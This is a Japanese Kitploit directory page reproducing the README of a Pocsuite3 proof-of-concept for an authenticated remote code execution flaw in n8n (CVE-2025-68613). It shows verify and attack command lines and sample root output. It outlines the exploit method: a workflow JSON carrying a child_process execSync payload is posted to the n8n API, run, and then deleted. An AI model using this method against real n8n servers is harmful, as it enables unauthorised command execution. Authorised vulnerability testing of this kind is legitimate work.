Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68613 — Pocsuite3 フレームワークに基づいて作成された脆弱性の検証・悪用スクリプトで、n8n ワークフロー自動化ツールにおける認証後のリモートコード実行(RCE)脆弱性を検出するために使用されます。 | Kitploit
ツール/GitHubGitHub/secjoker/cve-2025-68613
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubsecjoker/cve-2025-68613

CVE-2025-68613

Pocsuite3 フレームワークに基づいて作成された脆弱性の検証・悪用スクリプトで、n8n ワークフロー自動化ツールにおける認証後のリモートコード実行(RCE)脆弱性を検出するために使用されます。

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚀 n8n 認証済み RCE PoC (Pocsuite3)

CVE ID: CVE-2025-68613
種別: 認証済みリモートコード実行
フレームワーク: Pocsuite3

Python Pocsuite3 License

これは Pocsuite3 フレームワークに基づいて作成された脆弱性検証・利用スクリプトであり、n8n ワークフロー自動化ツールにおける認証後のリモートコード実行(RCE)の脆弱性を検出するためのものです。このスクリプトは無害な検証(Verify)とコマンド実行(Attack)の2つのモードをサポートし、テスト痕跡を自動的にクリーンアップする機能も備えています。


⚙️ パラメータ説明

このスクリプトは、Pocsuite3 の基本パラメータに以下のカスタムパラメータを追加しています。実行時には --options で渡す必要があります。

パラメータ名必須デフォルト値説明
api_key✅-ターゲットの X-N8N-API-KEY(認証に必須)
cmd❌idAttack モードで実行するシステムコマンド

🚀 使用方法

pocsuite3 がインストールされていることを確認し(pip install pocsuite3)、スクリプトを n8n_auth_rce.py として保存してください。

1. 検証モード (Verify Mode)

検証モードでは、スクリプトは安全な数学計算(11111 + 22222)を含むワークフローをターゲットに送信します。戻り値が 33333 の場合、JS エンジンが悪意を持って呼び出される可能性があることが証明されます。 このモードは無害で、システムコマンドは実行されません。

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --verify --options '{"api_key": "YOUR_API_KEY_HERE"}'

想定出力:

root@kitploit:~
[+] Vulnerable! JS Expression executed. Result: 33333

2. 攻撃モード (Attack Mode)

攻撃モードでは、任意のシステムコマンドを実行できます。デフォルトでは id コマンドを実行し、cmd パラメータでコマンドをカスタマイズすることもできます。

デフォルトコマンドを実行 (id):

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE"}'

カスタムコマンドを実行(例: whoami):

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE", "cmd": "whoami"}'

想定出力:

root@kitploit:~
[+] Command 'whoami' executed:
root

🧩 スクリプトロジック概要

この PoC の実行フローはクローズドループ操作として設計されており、対象システムへの残留影響を最小限に抑えます:

  1. 構築 (Construction): 提供された api_key を使用して、n8n-nodes-base.set ノードを含む悪意のある Workflow JSON を構築します。
  2. 注入 (Injection): Payload(Node.js コード require('child_process').execSync(...))をノードの value フィールドに注入します。
  3. 配備 (Deployment): POST リクエストを /rest/workflows に送信して一時ワークフローを作成し、workflow_id を取得します。
  4. トリガー (Trigger): POST リクエストを /rest/workflows/{id}/run に送信してワークフローの実行をトリガーし、返された JSON を解析してコマンド実行結果を取得します。
  5. クリーンアップ (Cleanup): 利用が成功したかどうかにかかわらず、最後に DELETE リクエストを /rest/workflows/{id} に送信して一時ワークフローを削除し、環境をクリーンな状態に保ちます。

⚠️ 免責事項 (Disclaimer)

使用前に必ずお読みください

  1. 認可の原則: このツールは、サイバーセキュリティ従事者が明確な許可を得た場合にのみ、対象システムのセキュリティテストまたは脆弱性検証のために使用してください。
  2. 違法行為: 許可のないペネトレーションテスト、攻撃行為、または不正な目的のためにこのツールを使用することは固く禁じられています。
  3. 責任の負担: このツールの使用によって生じたいかなる結果(システム損傷、データ損失、法的紛争などを含みますがこれらに限りません)も、すべて使用者が負担するものとし、開発者および貢献者は一切の法的責任を負いません。
  4. コンプライアンス: 使用者は現地の法令(中華人民共和国サイバーセキュリティ法など)を遵守する必要があります。
ツールをダウンロード